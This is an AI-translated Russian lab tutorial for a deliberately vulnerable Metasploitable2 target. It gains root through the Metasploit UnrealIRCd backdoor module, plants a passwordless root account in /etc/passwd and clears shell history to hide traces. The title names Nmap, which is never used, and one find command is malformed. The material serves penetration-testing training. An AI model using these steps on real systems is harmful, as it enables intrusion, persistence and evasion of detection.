Создание бэкдора и удаление следов на целевой машине с помощью Nmap

Beginner

💡 Этот учебник переведен с английского с помощью ИИ. Чтобы просмотреть оригинал, вы можете перейти на английский оригинал

Введение

В этом практическом занятии мы научимся создавать обратную дверь (backdoor) и удалять следы после успешного получения доступа к целевой машине в ходе пенетрационного атаки. Сценарий настроен в среде LabEx, где мы будем использовать терминал Kali для эксплойта уязвимостей на целевой машине Metasploitable2, получения root-доступа, создания обратной двери для последующего доступа и удаления любых следов, оставшихся в процессе атаки.


Skills Graph

Получение root-доступа на целевой машине

На этом шаге мы воспользуемся уязвимостью Unreal Ircd для получения root-доступа на целевой машине.

Теперь вы запустите машину-атакующую (контейнер Kali Linux) и целевую машину (виртуальную машину Metasploitable2) для эксперимента.

  1. Откройте терминал xfce на хост-машине LabEx и запустите целевую машину Metasploitable2, выполнив следующую команду:
sudo virsh start Metasploitable2

Подождите, пока целевая машина запустится, это может занять от 1 до 3 минут.

  1. Проверьте связь с целевой машиной, отправив ей пинги:
ping 192.168.122.102

Нажмите Ctrl+C, чтобы остановить отправку пингов.

  1. Запустите контейнер Kali Linux и войдите в среду bash, выполнив следующую команду:
docker run -ti --network host b5b709a49cd5 bash
  1. Внутри контейнера Kali проверьте сетевое соединение с целевой машиной:
ping 192.168.122.102

Нажмите Ctrl+C, чтобы остановить отправку пингов.

Теперь и машина-атакующая, и целевая машина запущены, и вы можете приступить к пенетрационному тестированию.

Примечание: Если вы случайно выйдете из текущего сеанса bash, контейнер Kali автоматически остановится. Вы можете снова выполнить команду docker run -ti --network host b5b709a49cd5 bash на хост-машине, чтобы запустить новый контейнер Kali и войти в bash для продолжения эксперимента.

  1. В контейнере Kali Linux введите следующие команды в терминале bash Kali Linux:
service postgresql start
msfdb init
cd ~
msfconsole

Это запустит службу базы данных PostgreSQL, инициализирует базу данных и запустит консоль Metasploit Framework (msfconsole) для дальнейших операций.

  1. Найдите модуль уязвимости Unreal Ircd:
search unreal_ircd
  1. Используйте модуль unix/irc/unreal_ircd_3281_backdoor:
use exploit/unix/irc/unreal_ircd_3281_backdoor
  1. Установите IP-адрес цели:
set RHOST 192.168.122.102
  1. Эксплуатируйте уязвимость для получения доступа:
exploit
  1. Проверьте текущего пользователя:
whoami

Вы должны увидеть, что вы получили root-доступ на целевой машине.

Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку

Создание обратной двери (backdoor)

Теперь, когда мы получили root-доступ, давайте создадим обратную дверь для последующего доступа к целевой машине.

Во - первых, если вы не находитесь в консоли Metasploit, вы должны запустить консоль Metasploit:

cd ~
msfconsole

Затем проверьте системную информацию:

uname -a

Найдите расположение bash для пользователя root:

cat /etc/passwd

Создайте учетную запись для обратной двери без пароля:

echo 'shiyanlou1234::0:0::/:/bin/sh' >> /etc/passwd

Проверьте создание учетной записи для обратной двери:

cat /etc/passwd

В выводе вы должны увидеть новую учетную запись shiyanlou1234.

Откройте новый терминал и подключитесь к целевой машине с использованием учетной записи для обратной двери:

telnet 192.168.122.102

При запросе введите имя пользователя shiyanlou1234.

Проверьте текущего пользователя:

whoami

Вы должны увидеть, что вы вошли в систему как пользователь обратной двери.

Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку

Удаление следов

После получения доступа и создания обратной двери (backdoor) важно удалить все следы, оставшиеся в процессе атаки, чтобы избежать обнаружения.

Во - первых, если вы не находитесь в консоли Metasploit, вы должны запустить консоль Metasploit:

cd ~
msfconsole

Одним из распространенных способов удаления следов является удаление истории команд. История хранится в файле .bash_history. Вы можете очистить историю с помощью следующей команды:

history -c

Для очистки файла .bash_history вы можете найти его расположение с помощью команды find:

find / -name.bash_history

Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку

Заключение

В этом практическом занятии мы научились получать root-доступ на целевой машине, используя уязвимость Unreal Ircd, создавать учетную запись для обратной двери (backdoor) для последующего доступа и удалять следы, оставшиеся в процессе атаки. Этот практический опыт поможет вам понять методы, используемые атакающими для сохранения постоянного доступа и скрытия своих следов после успешной пенетрационной атаки.